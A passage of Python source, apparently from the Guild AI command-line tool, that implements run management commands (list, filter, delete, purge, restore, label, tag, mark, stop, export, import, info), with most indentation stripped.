(comment.get("body") or "").lower(),
]
)
def _match_comments(s, comment_text):
if s == "-":
return not comment_text
return s.lower() in comment_text
def _apply_marked_filter(args, filters):
if args.filter_marked and args.filter_unmarked:
cli.error("--marked and --unmarked cannot both be used")
if args.filter_marked:
filters.append(_marked_filter())
if args.filter_unmarked:
filters.append(_marked_filter(False))
def _marked_filter(test_for=True):
def f(run):
marked = bool(run.get("marked"))
return marked if test_for is True else not marked
return f
def _apply_started_filter(args, ctx, filters):
if args.filter_started:
start, end = _parse_timerange(args.filter_started, ctx)
log.debug("time range filter: %s to %s", start, end)
filters.append(_started_filter(start, end))
def _parse_timerange(spec, ctx):
from guild import timerange
try:
return timerange.parse_spec(spec)
except ValueError as e:
cli.error("invalid RANGE: %s%s" % (e, _range_help_suffix(ctx)))
def _apply_sourcecode_digest_filter(args, filters):
if args.filter_digest:
filters.append(_digest_filter(args.filter_digest))
def _digest_filter(prefix):
def f(run):
return run.get("sourcecode_digest", "").startswith(prefix)
return f
def _range_help_suffix(ctx):
if not ctx:
return ""
return "\nTry '%s --help' for help specifying time ranges." % ctx.command_path
def _started_filter(start, end):
def f(run):
started = run.timestamp
if not started:
log.debug("%s no timestamp, skipping", run.id)
return False
started = datetime.datetime.fromtimestamp(started // 1000000)
if start and started < start:
log.debug("%s timestamp %s < %s, skipping", run.id, started, start)
return False
if end and started >= end:
log.debug("%s timestamp %s >= %s, skipping", run.id, started, start)
return False
log.debug("%s timestamp %s in range", run.id, started)
return True
return f
def select_runs(runs, select_specs, ctx=None):
if not select_specs:
return runs
selected = []
for spec in select_specs:
try:
slice_start, slice_end = _parse_slice(spec)
except ValueError:
selected.append(_find_run_by_id(spec, runs, ctx))
else:
if _in_range(slice_start, slice_end, runs):
selected.extend(runs[slice_start:slice_end])
else:
selected.append(_find_run_by_id(spec, runs, ctx))
return selected
def _parse_slice(spec):
try:
index = int(spec)
except ValueError:
m = re.match("(\\d+)?:(\\d+)?", spec)
if m:
try:
return (_slice_part(m.group(1), decr=True), _slice_part(m.group(2)))
except ValueError:
pass
raise ValueError(spec)
else:
return index - 1, index
def _slice_part(s, decr=False):
if s is None:
return None
elif decr:
return int(s) - 1
else:
return int(s)
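# Worked examples of the slice grammar above:
#   _parse_slice("3")   -> (2, 3)       # single index, 1-based
#   _parse_slice("2:5") -> (1, 5)       # range; start decremented to 0-based
#   _parse_slice(":")   -> (None, None) # all runs
#   _parse_slice("abc") raises ValueError, so select_runs() treats the spec
#   as a run ID prefix instead.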
def _find_run_by_id(id_part, runs, ctx):
matches = [run for run in runs if run.id.startswith(id_part)]
return cmd_impl_support.one_run(matches, id_part, ctx)
def _in_range(slice_start, slice_end, l):
return (slice_start is None or slice_start >= 0) and (
slice_end is None or slice_end <= len(l)
)
def list_runs(args, ctx=None):
if args.remote:
remote_impl_support.list_runs(args)
else:
_check_list_runs_args(args, ctx)
_list_runs(args, ctx)
def _check_list_runs_args(args, ctx):
cmd_impl_support.check_incompatible_args(
[
("comments", "verbose"),
("comments", "json"),
("json", "verbose"),
("archive", "deleted"),
],
args,
ctx,
)
def _list_runs(args, ctx):
if args.archive and not os.path.exists(args.archive):
cli.error("%s does not exist" % args.archive)
runs = filtered_runs(args, ctx=ctx)
if args.comments:
_list_runs_comments(_limit_runs(runs, args), comment_index_format=False)
elif args.json:
if args.limit or args.more or args.all:
cli.note("--json option always shows all runs")
_list_runs_json(runs)
else:
_list_runs_(_limit_runs(runs, args), args)
def _list_runs_json(runs):
runs_data = [_listed_run_json_data(run) for run in runs]
cli.out(json.dumps(runs_data))
def _listed_run_json_data(run):
run_data = _run_data(
run,
(
"exit_status",
"cmd",
"comments",
"marked",
"label",
"started",
"status",
"stopped",
"tags",
),
)
_apply_batch_proto(run, run_data)
return run_data
def _run_data(run, attrs):
data = {
"id": run.id,
"run_dir": run.path,
"opref": str(run.opref) if run.opref else "",
}
data.update({name: _run_attr(run, name) for name in attrs})
return data
def _run_attr(run, name):
base_attrs = ("status",)
if name in base_attrs:
return getattr(run, name)
else:
return run.get(name)
def _apply_batch_proto(run, data):
proto_dir = run.guild_path("proto")
if os.path.exists(proto_dir):
proto = runlib.for_dir(proto_dir)
data["batch_proto"] = _listed_run_json_data(proto)
def _list_runs_(runs, args):
    # runs are already limited by the caller; avoid applying the limit twice
    formatted = format_runs(runs)
cols = [
"index",
"op_desc",
"started",
"status_with_remote",
"label",
]
detail = RUN_DETAIL if args.verbose else None
cli.table(formatted, cols, detail=detail, max_width_adj=STYLE_TABLE_WIDTH_ADJ)
def _limit_runs(runs, args):
if args.all:
if args.limit is not None:
cli.error("--all and --limit cannot both be used")
return runs
if args.limit and args.limit > 0:
return runs[: args.limit]
limited = runs[: (args.more + 1) * RUNS_PER_GROUP]
if len(limited) < len(runs):
cli.note(
"Showing the first %i runs (%i total) - use --all "
"to show all or -m to show more" % (len(limited), len(runs))
)
return limited
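# For example, with 50 runs and no flags (args.more == 0) the first 20 runs
# are shown (RUNS_PER_GROUP); each -m adds another group of 20, --limit N
# shows the first N, and --all disables the cap entirely.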
def format_runs(runs):
formatted = []
for i, run in enumerate(runs):
try:
formatted_run = run_util.format_run(run, i + 1)
except Exception:
log.exception("formatting run in %s", run.path)
else:
formatted.append(formatted_run)
_apply_op_desc(formatted)
return formatted
def _apply_op_desc(formatted):
for fmt_run in formatted:
op_desc = _op_desc_base(fmt_run)
marked_suffix = " [marked]" if fmt_run["marked"] == "yes" else ""
fmt_run["op_desc"] = op_desc + marked_suffix
def _op_desc_base(fmt_run, apply_style=True):
op = fmt_run["operation"]
op_dir = _run_op_dir(fmt_run["_run"])
if not op_dir:
return _empty_style(op, apply_style)
return "%s%s" % (op, _styled_op_dir_suffix(op_dir, apply_style))
def _run_op_dir(run):
run = run.batch_proto or run
opref = run.opref
if opref.pkg_type == "guildfile":
return os.path.dirname(opref.pkg_name)
elif opref.pkg_type == "script":
return opref.pkg_name
elif opref.pkg_type == "import":
return os.path.dirname(opref.pkg_name)
else:
return None
def _empty_style(s, apply_style):
# Pad a string with an empty style for alignment in tables.
if apply_style:
return s + cli.style("", dim=True)
return s
def _styled_op_dir_suffix(op_dir, apply_style):
cwd = os.path.abspath(config.cwd())
if util.compare_paths(op_dir, cwd):
return _empty_style("", apply_style)
shortened_op_dir = run_util.shorten_op_dir(op_dir, cwd)
return _dim_style(" (%s)" % shortened_op_dir, apply_style)
def _dim_style(s, apply_style):
if apply_style:
return cli.style(s, dim=True)
return s
def format_run(run):
formatted = format_runs([run])
if not formatted:
raise ValueError("error formatting %s" % run)
assert len(formatted) == 1, formatted
return formatted[0]
def _no_selected_runs_exit(help_msg=None):
help_msg = (
help_msg or "No matching runs\n" "Try 'guild runs list' to list available runs."
)
cli.out(help_msg, err=True)
raise SystemExit(0)
def runs_op(
args,
ctx,
preview_msg,
confirm_prompt,
no_runs_help,
op_callback,
default_runs_arg=None,
confirm_default=False,
runs_callback=None,
):
get_selected = runs_callback or runs_op_selected
selected = get_selected(args, ctx, default_runs_arg)
if not selected:
_no_selected_runs_exit(no_runs_help)
formatted = None # expensive, lazily init as needed
if not args.yes:
cli.out(preview_msg, err=True)
formatted = format_runs(selected)
cols = [
"short_index",
"op_desc",
"started",
"status_with_remote",
"label",
]
cli.table(formatted, cols, indent=2, err=True)
fmt_confirm_prompt = confirm_prompt.format(count=len(selected))
if not cli.confirm(fmt_confirm_prompt, confirm_default):
raise SystemExit(exit_code.ABORTED)
_apply_runs_op_callback(op_callback, selected, formatted)
def _apply_runs_op_callback(op_callback, selected, formatted):
# pylint: disable=deprecated-method
if len(inspect.getargspec(op_callback).args) == 2:
if formatted is None:
formatted = format_runs(selected)
op_callback(selected, formatted)
else:
op_callback(selected)
def runs_op_selected(args, ctx, default_runs_arg=None):
default_runs_arg = default_runs_arg or ALL_RUNS_ARG
runs_arg = _remove_duplicates(args.runs or default_runs_arg)
filtered = filtered_runs(args, ctx)
return select_runs(filtered, runs_arg, ctx)
def _remove_duplicates(vals):
deduped = []
for val in vals:
if val not in deduped:
deduped.append(val)
return deduped
def delete_runs(args, ctx=None):
if args.remote:
remote_impl_support.delete_runs(args)
else:
_delete_runs(args, ctx)
def _delete_runs(args, ctx):
if args.permanent:
preview = cmd_impl_support.format_warn(
"WARNING: You are about to permanently delete the following runs:"
)
confirm = "Permanently delete {count} run(s)?"
else:
preview = "You are about to delete the following runs:"
confirm = "Delete {count} run(s)?"
no_runs_help = "Nothing to delete."
def delete(selected):
stoppable = [
run for run in selected if run.status == "running" and not run.remote
]
if stoppable and not args.yes:
cli.out(
cmd_impl_support.format_warn(
"WARNING: One or more runs are still running "
"and will be stopped before being deleted."
),
err=True,
)
if not cli.confirm("Really delete these runs?"):
raise SystemExit(exit_code.ABORTED)
for run in stoppable:
_stop_run(run, no_wait=True)
var.delete_runs(selected, args.permanent)
if args.permanent:
cli.out("Permanently deleted %i run(s)" % len(selected), err=True)
else:
cli.out("Deleted %i run(s)" % len(selected), err=True)
runs_op(
args,
ctx,
preview,
confirm,
no_runs_help,
delete,
confirm_default=not args.permanent,
)
def purge_runs(args, ctx):
if args.remote:
remote_impl_support.purge_runs(args)
else:
_purge_runs(args, ctx)
def _purge_runs(args, ctx):
preview = cmd_impl_support.format_warn(
"WARNING: You are about to permanently delete the following runs:"
)
confirm = "Permanently delete {count} run(s)?"
no_runs_help = "Nothing to purge."
def purge(selected):
var.purge_runs(selected)
cli.out("Permanently deleted %i run(s)" % len(selected), err=True)
runs_op(args.copy(deleted=True), ctx, preview, confirm, no_runs_help, purge)
def restore_runs(args, ctx):
if args.remote:
remote_impl_support.restore_runs(args)
else:
_restore_runs(args, ctx)
def _restore_runs(args, ctx):
preview = "You are about to restore the following runs:"
confirm = "Restore {count} run(s)?"
no_runs_help = "Nothing to restore."
def restore(selected):
var.restore_runs(selected)
cli.out("Restored %i run(s)" % len(selected), err=True)
runs_op(
args.copy(deleted=True),
ctx,
preview,
confirm,
no_runs_help,
restore,
confirm_default=True,
)
def run_info(args, ctx):
if args.remote:
remote_impl_support.run_info(args)
else:
_run_info(args, ctx)
def _run_info(args, ctx):
run = one_run(args, ctx)
_print_run_info(run, args)
def one_run(args, ctx):
filtered = filtered_runs(args, ctx=ctx)
if not filtered:
cli.error("no matching runs")
runspec = args.run or "1"
selected = select_runs(filtered, [runspec], ctx)
return cmd_impl_support.one_run(selected, runspec, ctx)
def _print_run_info(run, args):
data = _run_info_data(run, args)
if args.json:
_print_run_info_json(data)
else:
_print_run_info_ordered(data)
def _run_info_data(run, args):
data = []
_append_attr_data(run, args.private_attrs, data)
data.append(("tags", run.get("tags") or []))
data.append(("flags", run.get("flags") or {}))
proto = run.batch_proto
if proto:
data.append(("proto-flags", proto.get("flags") or {}))
data.append(("scalars", _scalar_info(run, args)))
if args.comments:
data.append(("comments", _format_comments_for_run_info(run)))
if args.env:
data.append(("environment", run.get("env") or {}))
if args.manifest:
data.append(("manifest", _format_run_manifest(run)))
if args.deps:
data.append(("dependencies", run.get("deps") or {}))
if args.private_attrs and args.json:
_maybe_append_proto_data(run, data)
return data
def _format_comments_for_run_info(run):
return [
_format_comment_for_run_info(comment) for comment in (run.get("comments") or [])
]
def _format_comment_for_run_info(comment):
if not isinstance(comment, dict):
return repr(comment)
return {
"user": comment.get("user") or "",
"host": comment.get("host") or "",
"time": util.format_timestamp(comment.get("time")),
"body": (comment.get("body") or "").strip(),
}
def _append_attr_data(run, include_private, data):
fmt_run = format_run(run)
for name in RUN_DETAIL:
data.append((name, fmt_run[name]))
for name in other_attr_names(run, include_private):
data.append((name, run_util.format_attr(run.get(name))))
if include_private:
data.append(("opref", str(run.opref)))
data.append(("op", run.get("op")))
def other_attr_names(run, include_private=False):
core_attrs = CORE_RUN_ATTRS + LEGACY_RUN_ATTRS
if include_private:
include = lambda x: x not in core_attrs
else:
include = lambda x: x[0] != "_" and x not in core_attrs
return [name for name in sorted(run.attr_names()) if include(name)]
def _scalar_info(run, args):
try:
return _scalar_info_(run, args)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("get scalars")
return cmd_impl_support.format_warn("ERROR: %s" % e)
def _scalar_info_(run, args):
return {
key: val
for key, val in _iter_scalars(run, args)
if args.all_scalars or filter_default_scalar(key)
}
def filter_default_scalar(key):
_prefix, tag = _split_scalar_key(key)
return not tag.startswith("sys/")
def _split_scalar_key(key):
parts = key.split("#", 1)
return ("", parts[0]) if len(parts) == 1 else (parts[0], parts[1])
def _iter_scalars(run, args):
from guild import index as indexlib # expensive
for s in indexlib.iter_run_scalars(run):
key = run_util.run_scalar_key(s)
if args.all_scalars:
yield key, _scalar_vals(s, args)
else:
yield key, _scalar_last_val(s, args)
def _scalar_vals(s, args):
return {
"first": _scalar_val(s, "first_val", "first_step", args.json),
"last": _scalar_val(s, "last_val", "last_step", args.json),
"min": _scalar_val(s, "min_val", "min_step", args.json),
"max": _scalar_val(s, "max_val", "min_step", args.json),
"avg": _scalar_val(s, "avg_val", "count", args.json),
"total": _scalar_val(s, "total", "count", args.json),
}
def _scalar_last_val(s, args):
return _scalar_val(s, "last_val", "last_step", args.json)
def _scalar_val(s, val_key, step_key, format_json):
val = s[val_key]
step = s[step_key]
if format_json:
return val, step
else:
return _format_scalar_val(val, step)
def _format_scalar_val(val, step):
if isinstance(val, float):
return "%f (step %i)" % (val, step)
    # Defensive here - val should not be None but we don't assert
    # because this is a summary op.
    val = "nan" if val is None else val
return "%s (step %i)" % (val, step)
def _comments_info(run, args):
return [
_format_comment_info(comment, args) for comment in run.get("comments") or []
]
def _format_comment_info(comment, args):
if args.json:
return comment
return "%s %s\n%s" % (
_format_comment_user(comment),
util.format_timestamp(comment.get("time")),
comment.get("body") or "",
)
def _res_sources_paths(sources):
paths = []
for source_paths in sources.values():
paths.extend(source_paths)
return sorted(paths)
def _format_run_manifest(run):
from guild import run_manifest
try:
m = run_manifest.manfiest_for_run(run)
except Exception as e:
log.error("cannot read run manifest: %s", e)
return {}
else:
return _formatted_run_manifest_items(m)
def _formatted_run_manifest_items(m):
formatted = {}
for args in m:
_apply_formatted_manifest_args(args, formatted)
return {name: sorted(items) for name, items in formatted.items()}
def _apply_formatted_manifest_args(args, formatted):
type = args[0]
if type == "s":
_apply_formatted_manifest_sourcecode_file(args[1:], formatted)
elif type == "d":
_apply_formatted_manifest_dep(args[1:], formatted)
def _apply_formatted_manifest_sourcecode_file(args, formatted):
section = formatted.setdefault("sourcecode", [])
section.append(args[0])
def _apply_formatted_manifest_dep(args, formatted):
section = formatted.setdefault("dependencies", [])
section.append(args[0])
def _maybe_append_proto_data(run, data):
proto = run.batch_proto
if proto:
proto_data = []
_append_attr_data(proto, True, proto_data)
data.append(("proto-run", proto_data))
def _print_run_info_json(data):
data = _tuple_lists_to_dict(data)
cli.out(json.dumps(data))
def _tuple_lists_to_dict(data):
if isinstance(data, list):
if data and isinstance(data[0], tuple):
return {name: _tuple_lists_to_dict(val) for name, val in data}
else:
return [_tuple_lists_to_dict(val) for val in data]
else:
return data
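# Illustrative example (not in the original source): lists of (name, value)
# tuples become nested dicts, so
#   [("id", "abc"), ("flags", [("lr", 0.1)])]
# serializes as {"id": "abc", "flags": {"lr": 0.1}}.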
def _print_run_info_ordered(data):
for name, val in data:
if isinstance(val, list):
_print_run_info_list(name, val)
elif isinstance(val, dict):
_print_run_info_dict(name, val)
else:
cli.out("%s: %s" % (name, val))
def _print_run_info_list(name, val):
cli.out("%s:" % name)
for item in val:
if isinstance(item, dict):
cli.out(" -")
for item_name, item_val in sorted(item.items()):
encoded = _fix_quoted_string(flag_util.encode_flag_val(item_val))
if "\n" in encoded:
cli.out(_indent("%s: |" % item_name, 4))
cli.out(_indent(_unindent(encoded), 6))
else:
cli.out(_indent("%s: %s" % (item_name, encoded), 4))
else:
cli.out(" - %s" % flag_util.encode_flag_val(item))
def _print_run_info_dict(name, val):
cli.out("%s:" % name)
for item_name, item_val in _sort_run_info_attr(name, val):
if isinstance(item_val, list):
cli.out(" %s:" % item_name)
for item_item in item_val:
cli.out(" - %s" % flag_util.encode_flag_val(item_item))
elif isinstance(item_val, dict):
cli.out(" %s:" % item_name)
# Use full YAML formatting for config blocks.
cli.out(_indent(yaml_util.encode_yaml(item_val), 4))
else:
cli.out(" %s: %s" % (item_name, flag_util.encode_flag_val(item_val)))
def _sort_run_info_attr(name, val):
if name == "scalars":
return _sort_run_info_scalars(val)
else:
return sorted(val.items())
def _sort_run_info_scalars(val):
key = lambda item: _split_scalar_key(item[0])
return sorted(val.items(), key=key)
def _indent(s, spaces):
prefix = " " * spaces
return "\n".join(["%s%s" % (prefix, line) for line in s.split("\n")])
def _fix_quoted_string(s):
if s.startswith("'") and s.endswith("'"):
return s[1:-1]
return s
def _unindent(s):
return "\n".join([line.strip() for line in s.split("\n")])
def label(args, ctx):
_check_label_args(args, ctx)
if args.remote:
remote_impl_support.label_runs(args)
else:
_set_labels(args, ctx)
def _check_label_args(args, ctx):
cmd_impl_support.check_required_args(
[
"set",
"append",
"prepend",
"remove",
"clear",
],
args,
ctx,
)
cmd_impl_support.check_incompatible_args(
[
("set", "append"),
("set", "prepend"),
("set", "remove"),
("set", "clear"),
("append", "prepend"),
("append", "clear"),
("append", "remove"),
("prepend", "clear"),
("prepend", "remove"),
],
args,
ctx,
)
def _set_labels(args, ctx):
preview = _set_labels_preview(args)
confirm = "Continue?"
no_runs = "No runs to modify."
def set_labels(selected):
for run in selected:
if args.clear:
run.del_attr("label")
else:
run.write_attr("label", _label_for_run(run, args).strip())
if args.clear:
cli.out("Cleared label for %i run(s)" % len(selected), err=True)
else:
cli.out("Labeled %i run(s)" % len(selected), err=True)
runs_op(args, ctx, preview, confirm, no_runs, set_labels, LATEST_RUN_ARG, True)
def _set_labels_preview(args):
if args.set:
return "You are about to label the following runs with '%s':" % args.set
elif args.prepend:
return (
"You are about to prepend '%s' to the label of the following runs:"
% args.prepend
)
elif args.append:
return (
"You are about to append '%s' to the label of the following runs:"
% args.append
)
elif args.remove:
return (
"You are about to remove '%s' from the label of the following runs:"
% args.remove
)
elif args.clear:
return "You are about to clear the label of the following runs:"
else:
assert False, args
def _label_for_run(run, args):
if args.set:
return format_run_label(args.set, run)
elif args.prepend:
return "%s %s" % (format_run_label(args.prepend, run), _run_label(run))
elif args.append:
return "%s %s" % (_run_label(run), format_run_label(args.append, run))
elif args.remove:
return _remove_label_parts(args.remove, _run_label(run))
def format_run_label(template, run):
fmt_params = run.get("flags") or {}
fmt_params["label"] = _run_label(run)
return op_util.run_label(template, fmt_params).strip()
def _run_label(run):
return run.get("label") or ""
def _remove_label_parts(parts, label):
for part in parts:
label = _remove_label_part(part, label)
return label
def _remove_label_part(part, label):
try:
split_parts = re.split(r"(^|\s)%s($|\s)" % part, label)
except Exception as e:
cli.error("cannot remove label part %r: %s" % e)
else:
return " ".join([s for s in [t.strip() for t in split_parts] if s])
def stop_runs(args, ctx=None):
if args.remote:
remote_impl_support.stop_runs(args)
else:
_stop_runs(args, ctx)
def _stop_runs(args, ctx):
preview = cmd_impl_support.format_warn("You are about to stop the following runs:")
confirm = "Stop {count} run(s)?"
no_runs_help = "Nothing to stop."
if not args.runs:
args.status_running = True
def stop_f(selected):
for run in selected:
_stop_run(run, args.no_wait)
def select_runs_f(args, ctx, default_runs_arg):
runs = runs_op_selected(args, ctx, default_runs_arg)
return [run for run in runs if not run.remote]
runs_op(
args,
ctx,
preview,
confirm,
no_runs_help,
stop_f,
None,
False,
select_runs_f,
)
def _stop_run(run, no_wait):
remote_lock = remote_run_support.lock_for_run(run)
if remote_lock:
_try_stop_remote_run(run, remote_lock, no_wait)
else:
_try_stop_local_run(run)
def _try_stop_remote_run(run, remote_lock, no_wait):
from guild import plugin as pluginlib # expensive
try:
plugin = pluginlib.for_name(remote_lock.plugin_name)
except LookupError:
        log.warning(
            "error stopping run '%s': plugin '%s' not available",
            run.id,
            remote_lock.plugin_name,
        )
else:
cli.out("Stopping %s (remote)" % run.id, err=True)
plugin.stop_run(run, dict(no_wait=no_wait))
def _try_stop_local_run(run):
pid = run.pid
if pid and util.pid_exists(pid):
cli.out("Stopping %s (pid %i)" % (run.id, run.pid), err=True)
_gone, alive = util.kill_process_tree(
pid, timeout=STOP_TIMEOUT, child_term_timeout=CHILD_TERM_TIMEOUT
)
if alive:
_handle_non_stopped_pids(alive)
def _handle_non_stopped_pids(alive):
alive_desc = ", ".join(alive)
cli.out("The following processes did not stop as expected: %s" % alive_desc)
cli.error()
def export(args, ctx):
preview = "You are about to %s the following runs to '%s':" % (
args.move and "move" or "copy",
args.location,
)
confirm = "Continue?"
no_runs = "No runs to export."
def export_f(selected):
if args.copy_resources and not args.yes:
cli.out(
cmd_impl_support.format_warn(
"WARNING: You specified --copy-resources, which will "
"copy resources used by each run."
),
err=True,
)
if not cli.confirm("Really copy resources exported runs?"):
raise SystemExit(exit_code.ABORTED)
try:
exported = run_util.export_runs(
selected,
args.location,
move=args.move,
copy_resources=args.copy_resources,
)
except run_util.RunsExportError as e:
cli.error(e.args[0])
else:
cli.out(
"Exported %i run(s) to %s" % (len(exported), args.location), err=True
)
runs_op(args, ctx, preview, confirm, no_runs, export_f, ALL_RUNS_ARG, True)
def import_(args, ctx):
if not os.path.exists(args.archive):
cli.error("archive '%s' does not exist" % args.archive)
if _is_zip_archive(args.archive):
if args.move:
cli.error("'--move' cannot be used with zip archives")
elif os.path.isfile(args.archive):
cli.error(
"invalid archive %s - expected a directory or a zip file" % args.archive
)
preview = "You are about to import (%s) the following runs from '%s':" % (
args.move and "move" or "copy",
args.archive,
)
confirm = "Continue?"
no_runs = "No runs to import."
def import_f(selected):
if args.copy_resources and not args.yes:
cli.out(
cmd_impl_support.format_warn(
"WARNING: You specified --copy-resources, which will "
"copy resources used by each run."
),
err=True,
)
if not cli.confirm("Really copy resources exported runs?"):
raise SystemExit(exit_code.ABORTED)
try:
imported = run_util.import_runs(
selected,
move=args.move,
copy_resources=args.copy_resources,
)
except run_util.RunsImportError as e:
cli.error(e.args[0])
cli.out("Imported %i run(s) from %s" % (len(imported), args.archive), err=True)
runs_op(args, ctx, preview, confirm, no_runs, import_f, ALL_RUNS_ARG, True)
def _is_zip_archive(path):
return path.lower().endswith(".zip")
def push(args, ctx):
preview = "You are about to copy (push%s) the following runs to %s:" % (
_delete_clause(args),
args.remote,
)
confirm = "Continue?"
no_runs = "No runs to copy."
def push_f(runs):
remote_impl_support.push_runs(runs, args)
runs_op(
args.copy(remote=None),
ctx,
preview,
confirm,
no_runs,
push_f,
ALL_RUNS_ARG,
True,
)
def _delete_clause(args):
if args.delete:
return " with delete"
else:
return ""
def pull(args, ctx):
preview = "You are about to copy (pull%s) the following runs from %s:" % (
_delete_clause(args),
args.remote,
)
confirm = "Continue?"
no_runs = "No runs to copy."
def pull_f(runs):
remote_impl_support.pull_runs(runs, args)
def filtered_runs_f(args, _ctx, _default_runs_arg):
filtered = remote_impl_support.filtered_runs(args)
return select_runs(filtered, args.runs, ctx)
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
pull_f,
ALL_RUNS_ARG,
True,
filtered_runs_f,
)
def mark(args, ctx=None):
if args.clear:
_clear_marked(args, ctx)
else:
_mark(args, ctx)
def _clear_marked(args, ctx):
preview = "You are about to unmark the following runs:"
confirm = "Continue?"
no_runs = "No runs to unmark."
def clear(selected):
for run in selected:
run.del_attr("marked")
cli.out("Unmarked %i run(s)" % len(selected), err=True)
if not args.runs:
args.filter_marked = True
runs_op(args, ctx, preview, confirm, no_runs, clear, ALL_RUNS_ARG, True)
def _mark(args, ctx):
preview = "You are about to mark the following runs:"
confirm = "Continue?"
no_runs = "No runs to mark."
def mark(selected):
for run in selected:
run.write_attr("marked", True)
cli.out("Marked %i run(s)" % len(selected), err=True)
if not args.runs:
args.filter_marked = True
runs_op(args, ctx, preview, confirm, no_runs, mark, LATEST_RUN_ARG, True)
def select(args, ctx):
_check_select_args(args, ctx)
_maybe_apply_select_all(args)
if args.all:
_print_all_selected_runs(args, ctx)
else:
_print_latest_selected_run(args, ctx)
def _check_select_args(args, ctx):
cmd_impl_support.check_incompatible_args(
[
("short_id", "attr"),
("min", "max"),
],
args,
ctx,
)
def _maybe_apply_select_all(args):
if len(args.runs) > 1 and not args.min and not args.max:
args.all = True
elif args.min or args.max:
args.all = False
def _print_all_selected_runs(args, ctx):
for run in _select_runs(args, ctx):
_print_select_info(run, args)
def _print_latest_selected_run(args, ctx):
run = select_run(args, ctx)
_print_select_info(run, args)
def select_run(args, ctx=None):
_check_select_run_args(args, ctx)
if args.min:
return _select_min_run(args, ctx, args.min)
elif args.max:
return _select_min_run(args, ctx, args.max, reverse=True)
else:
args.run = args.runs[0] if args.runs else None
return one_run(args, ctx)
def _check_select_run_args(args, ctx):
cmd_impl_support.check_incompatible_args([("min", "max")], args, ctx)
def _select_min_run(args, ctx, colspec, reverse=False):
runs = _select_runs(args, ctx)
assert runs # _select_runs exits early if nothing matches.
return _sort_selected_runs(runs, colspec, reverse)[0]
def _select_runs(args, ctx):
return runs_for_args(args, ctx=ctx)
def _sort_selected_runs(runs, colspec, reverse):
from guild import index as indexlib # expensive
colspec_val_for_run = _colspec_val_f(colspec)
index = indexlib.RunIndex()
index.refresh(runs, ["scalar", "flag", "attr"])
def key(run):
val = colspec_val_for_run(run, index)
log.debug("got %r for '%s' for run %s", val, colspec, run.id)
return val
return util.natsorted(runs, key=key, reverse=reverse)
def _colspec_val_f(colspec):
from guild import query
try:
cols = query.parse_colspec(colspec).cols
except query.ParseError as e:
cli.error("invalid col spec '%s': %s" % (colspec, e))
else:
assert cols, colspec
if len(cols) > 1:
cli.error("invalid col spec '%s': multiple cols not supported" % colspec)
col = cols[0]
if isinstance(col, query.Scalar):
return _scalar_val_f(col)
elif isinstance(col, query.Flag):
return _flag_val_f(col)
elif isinstance(col, query.Attr):
return _attr_val_f(col)
def _scalar_val_f(col):
if col.named_as:
log.warning("ignoring 'as %s' in scalar", col.named_as)
prefix, tag = col.split_key()
def f(run, index):
return index.run_scalar(run, prefix, tag, col.qualifier, col.step)
return f
def _flag_val_f(col):
def f(run, index):
return index.run_flag(run, col.name)
return f
def _attr_val_f(col):
def f(run, index):
return index.run_attr(run, col.name)
return f
def _print_select_info(run, args):
if args.attr:
_print_run_attr(run, args.attr)
elif args.short_id:
print(run.short_id)
elif args.path:
print(run.dir)
else:
print(run.id)
def _print_run_attr(run, attr_name):
util.try_apply(
[
lambda: _try_print_formatted_run_attr(run, attr_name),
lambda: _try_print_raw_run_attr(run, attr_name),
lambda: _no_such_run_attr_error(attr_name),
]
)
def _try_print_formatted_run_attr(run, attr_name):
formatted = run_util.format_run(run)
try:
val = formatted[attr_name]
except KeyError:
raise util.TryFailed()
else:
print(val)
def _try_print_raw_run_attr(run, attr_name):
try:
val = run[attr_name]
except KeyError:
raise util.TryFailed()
else:
print(yaml_util.encode_yaml(val))
def _no_such_run_attr_error(attr_name):
cli.error("no such run attribute '%s'" % attr_name)
def tag(args, ctx):
_check_tag_args(args, ctx)
if args.remote:
remote_impl_support.tag_runs(args)
else:
if args.list_all:
_list_all_tags(args, ctx)
else:
_set_tags(args, ctx)
def _check_tag_args(args, ctx):
cmd_impl_support.check_required_args(
[
"add",
"delete",
"clear",
"list_all",
],
args,
ctx,
)
cmd_impl_support.check_incompatible_args(
[
("add", "list_all"),
("delete", "list_all"),
("clear", "list_all"),
],
args,
ctx,
)
def _list_all_tags(args, ctx):
selected = runs_op_selected(args, ctx, ALL_RUNS_ARG)
tags = set()
for run in selected:
tags.update(_run_tags(run))
for tag in sorted(tags):
print(tag)
def _run_tags(run):
tags = run.get("tags")
if not tags:
return []
try:
return list(tags)
except Exception as e:
log.warning("Error reading tags for run %s: %s", run.id, e)
return []
def _set_tags(args, ctx):
preview = _set_tags_preview(args)
confirm = "Continue?"
no_runs = "No runs to modify."
def set_tags(selected):
for run in selected:
old_tags = _run_tags(run)
new_tags = _tags_for_run(old_tags, args)
run.write_attr("tags", new_tags)
if args.sync_labels:
new_label = _synced_label_for_tags(run, old_tags, args)
run.write_attr("label", new_label)
cli.out("Modified tags for %i run(s)" % len(selected), err=True)
runs_op(args, ctx, preview, confirm, no_runs, set_tags, LATEST_RUN_ARG, True)
def _set_tags_preview(args):
lines = ["You are about to modify tags for the following runs:"]
if args.sync_labels:
lines.append(
cmd_impl_support.format_warn(
"Labels are updated to reflect the latest tags."
)
)
else:
lines.append(
cmd_impl_support.format_warn(
"Labels are not updated - use --sync-labels to "
"apply changes run labels."
)
)
return "\n".join(lines)
def _tags_for_run(old_tags, args):
tags = set(old_tags or [])
tags.difference_update(old_tags if args.clear else args.delete)
tags.update(args.add)
return sorted(tags)
def _synced_label_for_tags(run, old_tags, args):
tags_to_delete = set(old_tags if args.clear else args.delete)
old_label = run.get("label") or ""
new_label = _remove_label_parts(tags_to_delete, old_label)
tags_to_prepend = _tags_not_in_label(args.add, old_label)
if tags_to_prepend:
new_label = "%s %s" % (" ".join(tags_to_prepend), new_label)
return new_label
def _tags_not_in_label(tags, label):
if not tags:
return []
label_parts = util.shlex_split(label)
return [tag for tag in tags if tag not in label_parts]
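# Illustrative example (not in the original source): with an existing label
# "baseline lr=0.1" and added tags ["baseline", "gpu"], only "gpu" is not
# already a label part, so the synced label becomes "gpu baseline lr=0.1".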
def comment(args, ctx):
if args.remote:
_check_comment_args_for_remote(args, ctx)
remote_impl_support.comment_runs(args)
else:
_check_comment_args(args, ctx)
_comment(args, ctx)
def _check_comment_args_for_remote(args, ctx):
_check_comment_args(args, ctx)
cmd_impl_support.check_incompatible_args(
[
("remote", "edit"),
],
args,
ctx,
)
cmd_impl_support.check_required_args(
[
"list",
"add",
"delete",
"clear",
],
args,
ctx,
